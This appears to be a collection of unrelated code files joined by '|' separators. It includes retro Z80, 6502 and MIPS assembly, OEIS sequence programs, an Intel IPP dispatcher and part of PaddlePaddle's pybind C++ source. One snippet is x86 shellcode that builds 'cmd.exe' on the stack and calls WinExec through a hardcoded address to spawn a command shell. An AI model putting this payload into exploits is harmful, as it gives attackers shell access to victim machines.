00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
;
; f_ansi_scrollup
;
; Scroll screen up one line
;
; We set the window to none-scrolling..
;
;
; $Id: f_ansi_scrollup.asm,v 1.3 2001/05/02 09:21:51 dom Exp $
;
XLIB ansi_SCROLLUP
INCLUDE "#stdio.def"
.ansi_SCROLLUP
ld a,1
call_oz(os_out)
ld a,255
call_oz(os_out)
ret
|
; A091650: Let M = the 4 X 4 matrix [0 1 0 0 / 0 0 1 0 / 0 0 0 1 / -1 -1 3 2]. Set seed vector = [1 1 1 1] = first row, then take M*[1 1 1 1] = [1 1 1 3] then M * [1 1 1 3], etc. Sequence gives terms in rightmost column.
; 1,3,7,21,59,171,491,1415,4073,11729,33771,97241,279993,806209,2321385,6684163,19246279,55417453,159568195,459458307,1322957467,3809304207,10968454313,31582405473,90937912211,261845282321,753953441489,2170922412257,6250921954449
mov $3,1
lpb $0
mov $2,$0
sub $0,2
seq $2,123941 ; The (1,2)-entry in the 3 X 3 matrix M^n, where M = {{2, 1, 1}, {1, 1, 0}, {1, 0, 0}}.
add $3,$2
lpe
add $3,2
add $0,$3
mul $0,2
sub $0,5
|
;
; ZX81 specific routines
; by Stefano Bodrato, Fall 2013
;
; int psg_init();
;
; Set up the PSG
;
;
; $Id: psg_init.asm,v 1.3 2016/06/26 20:32:08 dom Exp $
;
SECTION code_clib
PUBLIC psg_init
PUBLIC _psg_init
psg_init:
_psg_init:
ld e,@01010101
xor a ; R0: Channel A frequency low bits
call outpsg
ld e,a
ld d,12
psg_iniloop:
inc a ; R1-13: set all to 0 but 7 and 11
cp 7
jr z,skip
;cp 11
;jr z,skip
call outpsg
skip:
dec d
jr nz,psg_iniloop
ld e,@11111000 ; R7: Channel setting. Enable sound channels ABC and input on ports A and B
ld a,7
call outpsg
ld e,@00001011 ; R11: Envelope
ld a,11
outpsg:
;LD BC,$cf
LD BC,$df
OUT (C),a
LD C,$0f
;LD C,$1f
OUT (C),e
ret
|
# Trevor Hickey
# Code was written in MARS 4.2
# Program Description:
# This program will ask for 3 integers from the user.
# Once it has validated all of the user data, it will return the
# number with the largest value.
# Algorithm
# 1. Prompt User
# 2. Get User Value
# 3. While (userInput is invalid){
# Get User Value
# }
# 4. Store value as largest number
# 5. Get 2nd User Value
# 6. While (userInput is invalid){
# Get 2nd User Value
# }
# 7. If (2nd User Value > Current User Value){
# Store 2nd value as largest number
# }
# 8. Get 3rd User Value
# 9. While (userInput is invalid){
# Get 3nd User Value
# }
# 10. If (3nd User Value > Current User Value){
# Store 3nd value as largest number
# }
# 11. Output The Largest Number To The User
# 12. Exit Program
.data
###################################################################################
purpose: .asciiz "Enter 3 integers, and I will tell you which is the largest" #
prompt1: .asciiz "Please enter an integer value for number 1" #
prompt2: .asciiz "Please enter an integer value for number 2" #
prompt3: .asciiz "Please enter an integer value for number 3" #
prompt4: .asciiz "The largest number you entered was " #
###################################################################################
.text
.globl main ####################
main: # Algorithm Number #
########################################################### ###########################################################
# ASSEMBLY CODE # # SUDO CODE #
########################################################### # #
##Inform the user the purpose of the program # # #
la $a0, purpose # # PRINT:"Enter 3 integers, and I will tell #
li $a1, 1 # 01 # you which is the largest" #
li $v0, 55 # # #
syscall # # #
##########################################################################################################################
##Get Value 1 # # #
PROMT_USER_FOR_VALUE_1: la $a0, prompt1 # # Get User Value #
li $v0, 51 # 02 # While (userInput is invalid){ #
syscall # 03 # Get User Value #
bnez $a1, PROMT_USER_FOR_VALUE_1 # # } #
la $t0, ($a0) # 04 # Store userInput as largest value #
##########################################################################################################################
##Get Value 2 # # Get 2nd User Value #
PROMT_USER_FOR_VALUE_2: la $a0, prompt2 # # While (userInput is invalid){ #
li $v0, 51 # 05 # Get 2nd User Value #
syscall # 06 # } #
bnez $a1, PROMT_USER_FOR_VALUE_2 # # If (2nd User Value > Current User Value){ #
bgt $t0, $a0, SKIP # # Store 2nd value as largest number #
la $t0, ($a0) # 07 # } #
SKIP: # # #
##########################################################################################################################
##Get Value 3 # # Get 3rd User Value #
PROMT_USER_FOR_VALUE_3: la $a0, prompt3 # # While (userInput is invalid){ #
li $v0, 51 # # Get 3rd User Value #
syscall # 09 # } #
bnez $a1, PROMT_USER_FOR_VALUE_3 # # If (3rd User Value > Current User Value){ #
bgt $t0, $a0, SKIP2 # # Store 3rd value as largest number #
la $t0, ($a0) # 10 # } #
SKIP2: # # #
##########################################################################################################################
##Show User The Largest Number # # #
la $a0 prompt4 # # #
la $a1, ($t0) # 11 # PRINT:"The largest number you entered was #
li $v0, 56 # # 'largestNumber' #
syscall # # #
##########################################################################################################################
##Exit Safely # # #
li $v0, 10 # 12 # return 0; #
syscall # # #
##########################################################################################################################
|
EXTERN pixeladdress
INCLUDE "graphics/grafix.inc"
; Generic code to handle the pixel commands
; Define NEEDxxx before including
ld a,l
cp 208
ret nc
push bc ;Save callers value
call pixeladdress ;hl = address, a = pixel number
ld b,a
ld a,1
jr z, rotated ; pixel is at bit 0...
.plot_position
rlca
djnz plot_position
; a = byte holding pixel mask
; hl = address
rotated:
IF NEEDunplot
or (hl)
ld (hl),a
ENDIF
IF NEEDplot
cpl
and (hl)
ld (hl),a
ENDIF
IF NEEDxor
ld c,a
ld a,(hl)
cpl
xor c
cpl
ld (hl),a
ENDIF
IF NEEDpoint
ld c,a
ld a,(hl)
cpl
and c
ENDIF
pop bc ;Restore callers
ret
|
; A168856: Number of reduced words of length n in Coxeter group on 35 generators S_i with relations (S_i)^2 = (S_i S_j)^20 = I.
; 1,35,1190,40460,1375640,46771760,1590239840,54068154560,1838317255040,62502786671360,2125094746826240,72253221392092160,2456609527331133440,83524723929258536960,2839840613594790256640,96554580862222868725760
add $0,1
mov $3,1
lpb $0
sub $0,1
add $2,$3
div $3,$2
mul $2,34
lpe
mov $0,$2
div $0,34
|
; A008825: Expansion of (1+2*x^5+x^9)/((1-x)^2*(1-x^9)).
; 1,2,3,4,5,8,11,14,17,22,27,32,37,42,49,56,63,70,79,88,97,106,115,126,137,148,159,172,185,198,211,224,239,254,269,284,301,318,335,352,369,388,407,426,445,466,487,508,529,550,573,596,619,642,667,692,717,742,767,794,821,848,875,904,933,962,991,1020,1051,1082,1113,1144,1177,1210,1243,1276,1309,1344,1379,1414,1449,1486,1523,1560,1597,1634,1673,1712,1751,1790,1831,1872,1913,1954,1995,2038,2081,2124,2167,2212
mov $1,$0
mul $1,2
mov $2,$1
lpb $2
sub $2,9
add $0,$2
mov $3,$2
gcd $3,2
add $0,$3
lpe
add $0,1
|
;
; LOBSCH (Last Object Search) subrouting.
; Finds, and saves in LOBJAD, the address
; of the last object in a file; also
; counts, and returns in Y-reg, the number
; of objects in the file. File to search
; is EGO file if called with Y=0; is
; file at LOCAD if called with Y=1.
;
LOBSCH: LDX EGOLAD,Y ; Get pointer to file.
LDY #$FF ; Init object-count.
;
OBFIND: INX
STX LOBJAD ; Save addr of last obj.
LDA 1,X ; Set up to test bits
ASL ; 7 & 6 of each location.
BMI OBFIND ; b6=1. Not an object.
INY ; Bump object-count.
BCC OBFIND ; b7=0. An object. Continue.
RTS ; b7=1. End of file. Done.
;
;
;
; ADDOBJ (Add Object) subroutine. Called to
; add a dropped object to a location file,
; or a picked-up object to EGO file.
; LINTAX is the pointer to the address of
; the location of interest: 0 for EGO,
; 1 for file specified by LOCAD. Calls
; LOBSCH subroutine. Object to be added
; is specified by contents of OBJ.
;
ADDOBJ: LDY LINTAX ; Point to file of interest.
JSR LOBSCH ; Find last obj's address.
LDX #EOCM ; Start at End of Cave Map.
AOBLP: LDA 0,X ; Move all files up one
STA 1,X ; location to make room
DEX ; for the object.
CPX LOBJAD ; Done yet?
BNE AOBLP ; No. Keep moving.
LDA OBJ ; Yes, store object just
STA 1,X ; above last object in
RTS ; the file; return.
;
;
; SPROC (Special Processing) segment.
; Entered from Main Move Loop (MNMVLP)
; following a "direction" command, this
; code takes care of any special pro-
; hibitions against moving in the com-
; manded direction. (Examples -- can't
; go through a steel grate, or past a
; dragon.) Possible exits from a SPROC
; are: to MOVER, if no problems with
; the command direction,
; to HOWMSG, if "How ? " is to be
; shown to indicate improper
; conditions for the move, or
; to MSGAML, showing "Halted By
; The Dragon", if appropriate.
;
SPROC: TAY
STY DIR ; Save direction for MOVER.
LDX LOCNUM
LDA LNAMAD,X ; If at grate (or gully),
CMP ADOPGR-5,X ; is grate open (or is
; bridge made)?
BEQ SPATS ; Yes, move is OK.
CPX #[ADGRM-LNAMAD] ; No. At closed
; grate?
BEQ SPCHKD ; Yes, disallow Down.
CPX #[ADGYM-LNAMAD] ; At bridgeless
; gully?
BEQ SPCHKW ; Yes, disallow West.
SPATS: CPX #[ADTSM-LNAMAD] ; At shaft?
BNE SPATSS
LDA NOBCRY ; Yes, carrying anything?
BNE SPCHKD ; Yes, disallow Down.
;
SPATSS: CPX #[ADSSM-LNAMAD] ; At steps?
BNE SPATRH
LDA BURDEN ; Yes, carrying Gold?
BMI SPCHKU ; Yes, disallow Up.
;
SPATRH: CPX #[ADRHM-LNAMAD] ; At Royal Hall?
BNE SPCONT
LDA DRAGON ; Yes, is Dragon there?
BEQ SPCONT
DEY ; Yes, but going East
BEQ SPCONT ; is OK. Continue.
LDY #<HBDMS ; All other directions,
JMP MSGAML ; "Halted by Dragon."
;
SPCHKD: DEY ; Check for Down,
SPCHKU: DEY ; for Up, or
SPCHKW: CPY #3 ; for West.
BNE SPCONT ; Other directions are OK.
JMP HOWMSG ; Disallowed direction
; produces "How ? ".
;
SPCONT: JMP MOVER ; Continue Move process.
;
;
;
;
; These three bytes
; are left spare for
; user expansion....
|
; A185906: Weight array of A000007 (which has only one nonzero term and whose second accumulation array is the multiplication table for the positive integers), by antidiagonals.
; 1,-1,-1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
mov $1,$0
div $0,4
sub $2,$1
dif $2,2
add $0,$2
pow $0,$2
|
BITS 32
section .data
section .text
global _start
_start:
push ebp
mov ebp, esp
xor eax, eax
mov byte al, 0x08
sub esp, eax
xor eax, eax
mov byte [ebp-0x08], 0x63
mov byte [ebp-0x07], 0x6d
mov byte [ebp-0x06], 0x64
mov byte [ebp-0x05], 0x2e
mov byte [ebp-0x04], 0x65
mov byte [ebp-0x03], 0x78
mov byte [ebp-0x02], 0x65
mov byte [ebp-0x01], al
lea ebx, [ebp - 0x08]
inc eax
push eax
push ebx
mov edx, 0x7c862aed ; winexec(cmd.exe)
call edx
xor eax, eax
inc eax
mov edx, 0x7c81cb12 ; exit(1)
call edx |
; A064322: Triply triangular numbers.
; 0,1,21,231,1540,7260,26796,82621,222111,536130,1186570,2445366,4747821,8763391,15487395,26357430,43398586,69401871,108140571,164629585,245433090,359026206,516216646,730632651,1019283825,1403201800,1908167976,2565535896,3413156131,4496411865,5869373685,7596082396,9751968996,12425421261,15719506705,19753861995,24666759216,30617359696,37788166416,46387686345,56653314355,68854450686,83295864246,100321314346,120317443785,143717956515,171008093431,202729420146,239484940926,281944553275,330850857975
add $0,1
bin $0,2
add $0,1
bin $0,2
add $0,1
bin $0,2
|
extern m7_ippsGFpECGetInfo_GF:function
extern n8_ippsGFpECGetInfo_GF:function
extern y8_ippsGFpECGetInfo_GF:function
extern e9_ippsGFpECGetInfo_GF:function
extern l9_ippsGFpECGetInfo_GF:function
extern n0_ippsGFpECGetInfo_GF:function
extern k0_ippsGFpECGetInfo_GF:function
extern ippcpJumpIndexForMergedLibs
extern ippcpSafeInit:function
segment .data
align 8
dq .Lin_ippsGFpECGetInfo_GF
.Larraddr_ippsGFpECGetInfo_GF:
dq m7_ippsGFpECGetInfo_GF
dq n8_ippsGFpECGetInfo_GF
dq y8_ippsGFpECGetInfo_GF
dq e9_ippsGFpECGetInfo_GF
dq l9_ippsGFpECGetInfo_GF
dq n0_ippsGFpECGetInfo_GF
dq k0_ippsGFpECGetInfo_GF
segment .text
global ippsGFpECGetInfo_GF:function (ippsGFpECGetInfo_GF.LEndippsGFpECGetInfo_GF - ippsGFpECGetInfo_GF)
.Lin_ippsGFpECGetInfo_GF:
db 0xf3, 0x0f, 0x1e, 0xfa
call ippcpSafeInit wrt ..plt
align 16
ippsGFpECGetInfo_GF:
db 0xf3, 0x0f, 0x1e, 0xfa
mov rax, qword [rel ippcpJumpIndexForMergedLibs wrt ..gotpc]
movsxd rax, dword [rax]
lea r11, [rel .Larraddr_ippsGFpECGetInfo_GF]
mov r11, qword [r11+rax*8]
jmp r11
.LEndippsGFpECGetInfo_GF:
|
/* Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */
#include <Python.h>
#include <algorithm>
#include <cctype>
#include <cstdlib>
#include <iterator>
#include <map>
#include <memory>
#include <mutex> // NOLINT // for call_once
#include <string>
#include <tuple>
#include <type_traits>
#include <unordered_map>
#include <unordered_set>
#include <utility>
#include <vector>
#include "paddle/fluid/framework/convert_utils.h"
#include "paddle/fluid/framework/custom_operator.h"
#include "paddle/fluid/framework/data_layout.h"
#include "paddle/fluid/framework/data_type_transform.h"
#include "paddle/fluid/framework/executor.h"
#include "paddle/fluid/framework/executor_cache.h"
#include "paddle/fluid/framework/executor_gc_helper.h"
#include "paddle/fluid/framework/feed_fetch_method.h"
#include "paddle/fluid/framework/feed_fetch_type.h"
#include "paddle/fluid/framework/garbage_collector.h"
#include "paddle/fluid/framework/io/fs.h"
#include "paddle/fluid/framework/ir/coalesce_grad_tensor_pass.h"
#include "paddle/fluid/framework/ir/cost_model.h"
#include "paddle/fluid/framework/ir/generate_pass.h"
#include "paddle/fluid/framework/ir/pass_builder.h"
#include "paddle/fluid/framework/lod_rank_table.h"
#include "paddle/fluid/framework/lod_tensor_array.h"
#include "paddle/fluid/framework/new_executor/standalone_executor.h"
#include "paddle/fluid/framework/op_info.h"
#include "paddle/fluid/framework/op_registry.h"
#include "paddle/fluid/framework/op_version_registry.h"
#include "paddle/fluid/framework/parallel_executor.h"
#include "paddle/fluid/framework/phi_utils.h"
#include "paddle/fluid/framework/prune.h"
#include "paddle/fluid/framework/reader.h"
#include "paddle/fluid/framework/save_load_util.h"
#include "paddle/fluid/framework/scope_pool.h"
#include "paddle/fluid/framework/selected_rows_utils.h"
#include "paddle/fluid/framework/tensor_util.h"
#include "paddle/fluid/framework/trainer.h"
#include "paddle/fluid/framework/type_defs.h"
#include "paddle/fluid/framework/version.h"
#include "paddle/fluid/imperative/amp_auto_cast.h"
#include "paddle/fluid/imperative/layer.h"
#include "paddle/fluid/memory/allocation/allocator_strategy.h"
#include "paddle/fluid/memory/allocation/mmap_allocator.h"
#include "paddle/fluid/operators/activation_op.h"
#include "paddle/fluid/operators/common_infer_shape_functions.h"
#include "paddle/fluid/operators/py_func_op.h"
#include "paddle/fluid/platform/cpu_helper.h"
#include "paddle/fluid/platform/cpu_info.h"
#include "paddle/fluid/platform/device/device_wrapper.h"
#include "paddle/fluid/platform/device_context.h"
#include "paddle/fluid/platform/dynload/dynamic_loader.h"
#include "paddle/fluid/platform/enforce.h"
#include "paddle/fluid/platform/init.h"
#include "paddle/fluid/platform/monitor.h"
#include "paddle/fluid/platform/place.h"
#include "paddle/fluid/platform/profiler.h"
#include "paddle/fluid/pybind/cuda_streams_py.h"
#include "paddle/fluid/pybind/distributed_py.h"
#include "paddle/fluid/pybind/eager.h"
#include "paddle/fluid/pybind/imperative.h"
#include "paddle/fluid/pybind/io.h"
#include "paddle/phi/core/compat/convert_utils.h"
#include "paddle/phi/core/lod_utils.h"
#include "paddle/utils/none.h"
#ifdef PADDLE_WITH_ASCEND
#include "paddle/fluid/pybind/ascend_wrapper_py.h"
#endif
#include "paddle/fluid/pybind/bind_cost_model.h"
#include "paddle/fluid/pybind/bind_fleet_executor.h"
#include "paddle/fluid/pybind/box_helper_py.h"
#include "paddle/fluid/pybind/communication.h"
#include "paddle/fluid/pybind/compatible.h"
#include "paddle/fluid/pybind/const_value.h"
#include "paddle/fluid/pybind/data_set_py.h"
#include "paddle/fluid/pybind/exception.h"
#include "paddle/fluid/pybind/fleet_wrapper_py.h"
#include "paddle/fluid/pybind/generator_py.h"
#include "paddle/fluid/pybind/global_value_getter_setter.h"
#include "paddle/fluid/pybind/gloo_context_py.h"
#include "paddle/fluid/pybind/gloo_wrapper_py.h"
#include "paddle/fluid/pybind/heter_wrapper_py.h"
#include "paddle/fluid/pybind/inference_api.h"
#include "paddle/fluid/pybind/ir.h"
#include "paddle/fluid/pybind/metrics_py.h"
#include "paddle/fluid/pybind/ps_gpu_wrapper_py.h"
#include "paddle/fluid/pybind/pybind_boost_headers.h"
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
#include "paddle/fluid/pybind/nccl_wrapper_py.h"
#endif
#include "paddle/fluid/framework/data_type.h"
#include "paddle/fluid/pybind/protobuf.h"
#include "paddle/fluid/pybind/pybind.h" // NOLINT
#include "paddle/fluid/pybind/reader_py.h"
#include "paddle/fluid/pybind/tensor_py.h"
#include "paddle/fluid/string/to_string.h"
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
#include "paddle/fluid/operators/nccl/nccl_gpu_common.h"
#endif
#ifndef PADDLE_WITH_HIP
#include "paddle/fluid/platform/device/gpu/cuda/cuda_profiler.h"
#endif
#include "paddle/fluid/platform/device/gpu/gpu_info.h"
#endif
#ifdef PADDLE_WITH_ASCEND_CL
#include "paddle/fluid/platform/collective_helper.h"
#include "paddle/fluid/platform/device/npu/npu_info.h"
#include "paddle/fluid/platform/device/npu/npu_profiler.h"
#endif
#ifdef PADDLE_WITH_XPU
#include "paddle/fluid/platform/device/xpu/xpu_info.h"
#include "paddle/fluid/platform/device/xpu/xpu_op_list.h"
#endif
#include "paddle/fluid/platform/cuda_graph_with_memory_pool.h"
#ifdef PADDLE_WITH_IPU
#include "paddle/fluid/platform/device/ipu/ipu_backend.h"
#include "paddle/fluid/platform/device/ipu/ipu_info.h"
#endif
#ifdef PADDLE_WITH_MLU
#include "paddle/fluid/platform/device/mlu/mlu_info.h"
#endif
#ifdef PADDLE_WITH_CRYPTO
#include "paddle/fluid/pybind/crypto.h"
#endif
#if defined PADDLE_WITH_PSCORE
#include "paddle/fluid/pybind/fleet_py.h"
#endif
#include "pybind11/stl.h"
DECLARE_bool(use_mkldnn);
// disable auto conversion to list in Python
PYBIND11_MAKE_OPAQUE(paddle::framework::LoDTensorArray);
PYBIND11_MAKE_OPAQUE(paddle::framework::FetchUnmergedList);
PYBIND11_MAKE_OPAQUE(paddle::framework::FetchList);
PYBIND11_MAKE_OPAQUE(paddle::framework::FetchType);
namespace paddle {
namespace pybind {
PyTypeObject *g_place_pytype = nullptr;
PyTypeObject *g_cudaplace_pytype = nullptr;
PyTypeObject *g_cpuplace_pytype = nullptr;
PyTypeObject *g_xpuplace_pytype = nullptr;
PyTypeObject *g_npuplace_pytype = nullptr;
PyTypeObject *g_cudapinnedplace_pytype = nullptr;
PyTypeObject *g_mluplace_pytype = nullptr;
PyTypeObject *g_framework_tensor_pytype = nullptr;
PyTypeObject *g_framework_lodtensorarray_pytype = nullptr;
bool IsCompiledWithCUDA() {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
return false;
#else
return true;
#endif
}
bool IsCompiledWithNCCL() {
#ifdef PADDLE_WITH_NCCL
return true;
#else
return false;
#endif
}
bool IsCompiledWithROCM() {
#ifndef PADDLE_WITH_HIP
return false;
#else
return true;
#endif
}
bool IsCompiledWithAscend() {
#ifndef PADDLE_WITH_ASCEND
return false;
#else
return true;
#endif
}
bool IsCompiledWithXPU() {
#ifndef PADDLE_WITH_XPU
return false;
#else
return true;
#endif
}
bool IsCompiledWithNPU() {
#ifndef PADDLE_WITH_ASCEND_CL
return false;
#else
return true;
#endif
}
bool IsCompiledWithIPU() {
#ifndef PADDLE_WITH_IPU
return false;
#else
return true;
#endif
}
bool IsCompiledWithMKLDNN() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
return true;
#endif
}
bool IsCompiledWithCINN() {
#ifndef PADDLE_WITH_CINN
return false;
#else
return true;
#endif
}
bool IsCompiledWithMLU() {
#ifndef PADDLE_WITH_MLU
return false;
#else
return true;
#endif
}
bool IsCompiledWithHETERPS() {
#ifndef PADDLE_WITH_HETERPS
return false;
#else
return true;
#endif
}
bool SupportsBfloat16() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
if (platform::MayIUse(platform::cpu_isa_t::avx512_core))
return true;
else
return false;
#endif
}
bool SupportsBfloat16FastPerformance() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
if (platform::MayIUse(platform::cpu_isa_t::avx512_bf16))
return true;
else
return false;
#endif
}
bool SupportsInt8() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
return (platform::MayIUse(platform::cpu_isa_t::avx2) ||
platform::MayIUse(platform::cpu_isa_t::avx512f));
#endif
}
bool SupportsVNNI() {
#ifndef PADDLE_WITH_MKLDNN
return false;
#else
return platform::MayIUse(platform::cpu_isa_t::avx512_core_vnni);
#endif
}
bool IsCompiledWithBrpc() {
#ifndef PADDLE_WITH_DISTRIBUTE
return false;
#endif
return true;
}
bool IsCompiledWithDIST() {
#ifdef PADDLE_WITH_DISTRIBUTE
return true;
#else
return false;
#endif
}
template <typename PlaceType1, typename PlaceType2>
static inline bool IsSamePlace(const PlaceType1 &p1, const PlaceType2 &p2) {
return paddle::platform::Place(p1) == paddle::platform::Place(p2);
}
template <typename PlaceType>
static inline int PlaceIndex(const PlaceType &p) {
return static_cast<int>(paddle::platform::Place(p).GetType());
}
static PyObject *GetPythonAttribute(PyObject *obj, const char *attr_name) {
// NOTE(zjl): PyObject_GetAttrString would return nullptr when attr_name
// is not inside obj, but it would also set the error flag of Python.
// If the error flag is set in C++, C++ code would not raise Exception,
// but Python would raise Exception once C++ call ends.
// To avoid unexpected Exception raised in Python, we check whether
// attribute exists before calling PyObject_GetAttrString.
//
// Caution: PyObject_GetAttrString would increase reference count of PyObject.
// Developer should call Py_DECREF manually after the attribute is not used.
if (PyObject_HasAttrString(obj, attr_name)) {
return PyObject_GetAttrString(obj, attr_name);
} else {
return nullptr;
}
}
template <typename T>
static T PyObjectCast(PyObject *obj) {
try {
return py::cast<T>(py::handle(obj));
} catch (py::cast_error &) {
PADDLE_THROW(platform::errors::InvalidArgument(
"Python object is not type of %s, the real type is %s",
typeid(T).name(), obj->ob_type->tp_name));
}
}
using PyNameVarBaseMap = std::unordered_map<std::string, py::handle>;
static std::vector<std::shared_ptr<imperative::VarBase>> GetVarBaseList(
const PyNameVarBaseMap &state_dict) {
std::vector<std::shared_ptr<imperative::VarBase>> vec_res;
vec_res.reserve(state_dict.size());
for (auto ¶ : state_dict) {
PyObject *py_obj = para.second.ptr();
if (!py_obj || py_obj == Py_None) {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameter [%s] to save is None", para.first));
}
vec_res.emplace_back(
PyObjectCast<std::shared_ptr<imperative::VarBase>>(py_obj));
}
return vec_res;
}
static std::vector<std::string> inline GetNameList(
const py::handle &py_handle) {
std::vector<std::string> vec_res;
PyObject *py_obj = py_handle.ptr(); // get underlying PyObject
// Python None is not nullptr in C++!
if (!py_obj || py_obj == Py_None) {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameter list to save is None"));
}
if (PyList_Check(py_obj)) {
size_t len = PyList_GET_SIZE(py_obj);
vec_res.reserve(len);
const char *kNameField = "name";
for (size_t i = 0; i < len; ++i) {
PyObject *py_name =
PyObject_GetAttrString(PyList_GET_ITEM(py_obj, i), kNameField);
PADDLE_ENFORCE_NOT_NULL(py_name,
platform::errors::InvalidArgument(
"The name of parameter to save is None"));
vec_res.emplace_back(PyObjectCast<std::string>(py_name));
Py_DECREF(py_name);
}
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameters to save is not a list"));
}
return vec_res;
}
static void inline CreateVariableIfNotExit(
const py::handle &py_handle, const framework::Scope &scope,
const framework::Executor *exe = nullptr) {
std::vector<std::string> vec_res;
PyObject *py_obj = py_handle.ptr(); // get underlying PyObject
// Python None is not nullptr in C++!
if (!py_obj || py_obj == Py_None) {
PADDLE_THROW(
platform::errors::InvalidArgument("The parameter list to set is None"));
}
if (PyList_Check(py_obj)) {
size_t len = PyList_GET_SIZE(py_obj);
vec_res.reserve(len);
const char *kNameField = "name";
const char *kVarDescField = "desc";
for (size_t i = 0; i < len; ++i) {
PyObject *py_name =
PyObject_GetAttrString(PyList_GET_ITEM(py_obj, i), kNameField);
PADDLE_ENFORCE_NOT_NULL(py_name,
platform::errors::InvalidArgument(
"The name of parameter to set is None"));
auto para_name = PyObjectCast<std::string>(py_name);
Py_DECREF(py_name);
auto var = scope.FindVar(para_name);
if (var == nullptr) {
PADDLE_ENFORCE_NOT_NULL(exe,
platform::errors::InvalidArgument(
"Parameter not Initialized, "
"Please set argument [executor] not None "
"or run startup program first"));
PyObject *py_var_desc =
PyObject_GetAttrString(PyList_GET_ITEM(py_obj, i), kVarDescField);
PADDLE_ENFORCE_NOT_NULL(
py_var_desc, platform::errors::InvalidArgument(
"The var_desc of parameter to set is None"));
auto var_desc = PyObjectCast<framework::VarDesc>(py_var_desc);
Py_DECREF(py_var_desc);
var = const_cast<framework::Scope *>(&scope)->Var(para_name);
auto *tensor_temp = var->GetMutable<framework::LoDTensor>();
tensor_temp->Resize(phi::make_ddim(var_desc.GetShape()));
tensor_temp->mutable_data(
exe->GetPlace(),
framework::TransToPhiDataType(var_desc.GetDataType()));
}
}
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameters to set is not a list"));
}
return;
}
static void AssertStaticGraphAndDygraphGradMakerNoDiff() {
std::set<std::string> ops;
for (auto &pair : framework::OpInfoMap::Instance().map()) {
bool has_static_grad_maker = (pair.second.grad_op_maker_ != nullptr);
bool has_dygraph_grad_maker =
(pair.second.dygraph_grad_op_maker_ != nullptr);
if (has_static_grad_maker ^ has_dygraph_grad_maker) {
bool has_kernel =
(framework::OperatorWithKernel::AllOpKernels().count(pair.first) > 0);
if (has_kernel) {
ops.insert(pair.first);
} else {
VLOG(5) << pair.first << " has no kernels, skip";
}
}
}
PADDLE_ENFORCE_EQ(ops.empty(), true,
platform::errors::Unimplemented(
"OperatorWithKernel [%s] have only static graph grad "
"maker or have only dygraph grad maker, which is not "
"allowed",
string::join_strings(ops, ',')));
}
#ifdef PADDLE_WITH_NCCL
static int GetNCCLVersion() {
#if NCCL_VERSION_CODE >= 2304
int ver;
PADDLE_ENFORCE_GPU_SUCCESS(platform::dynload::ncclGetVersion(&ver));
return ver;
#else
PADDLE_THROW(platform::errors::External(
"Cannot get NCCL version successfully when nccl version < 2.3.4"));
#endif
}
#endif
template <typename PlaceType>
static void TensorCopyFrom(framework::Tensor *dst, const framework::Tensor &src,
const PlaceType &place, int64_t batch_size) {
if (batch_size < 0) {
framework::TensorCopy(src, place, dst);
} else {
auto sliced = src.Slice(0, batch_size);
framework::TensorCopy(sliced, place, dst);
}
}
#ifdef PADDLE_WITH_AVX
PYBIND11_MODULE(core_avx, m) {
#else
PYBIND11_MODULE(core_noavx, m) {
#endif
BindImperative(&m);
BindEager(&m);
BindCudaStream(&m);
// Not used, just make sure cpu_info.cc is linked.
paddle::platform::CpuTotalPhysicalMemory();
paddle::memory::allocation::UseAllocatorStrategyGFlag();
AssertStaticGraphAndDygraphGradMakerNoDiff();
m.doc() = "C++ core of PaddlePaddle";
// using framework in this function. Since it is inside a function, it will
// not cause namespace pollution.
using namespace paddle::framework; // NOLINT
BindException(&m);
m.def("set_num_threads", &platform::SetNumThreads);
m.def("disable_signal_handler", &DisableSignalHandler);
m.def("clear_gradients",
[](std::vector<std::shared_ptr<imperative::VarBase>> param_list,
bool set_to_zero) {
for (auto param : param_list) {
param->ClearGradient(set_to_zero);
}
});
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("cudnn_version", &platform::DnnVersion);
m.def("gpu_memory_available", []() {
size_t available = 0;
size_t total = 0;
paddle::platform::GpuMemoryUsage(&available, &total);
return available;
});
#endif
#ifdef PADDLE_WITH_NCCL
m.def("nccl_version", &GetNCCLVersion);
#endif
m.def("is_cuda_graph_capturing", &platform::IsCUDAGraphCapturing);
#ifdef PADDLE_WITH_CUDA
py::class_<platform::CUDAGraph>(m, "CUDAGraph")
.def_static("begin_capture",
[](platform::CUDAPlace place, int mode) {
platform::BeginCUDAGraphCapture(
place, static_cast<cudaStreamCaptureMode>(mode));
})
.def_static("end_capture", &platform::EndCUDAGraphCapture)
.def("replay", &platform::CUDAGraph::Replay)
.def("reset", &platform::CUDAGraph::Reset)
.def("print_to_dot_files", &platform::CUDAGraph::PrintToDotFiles);
#endif
m.def("wait_device", [](const platform::Place &place) {
platform::DeviceContextPool::Instance().Get(place)->Wait();
});
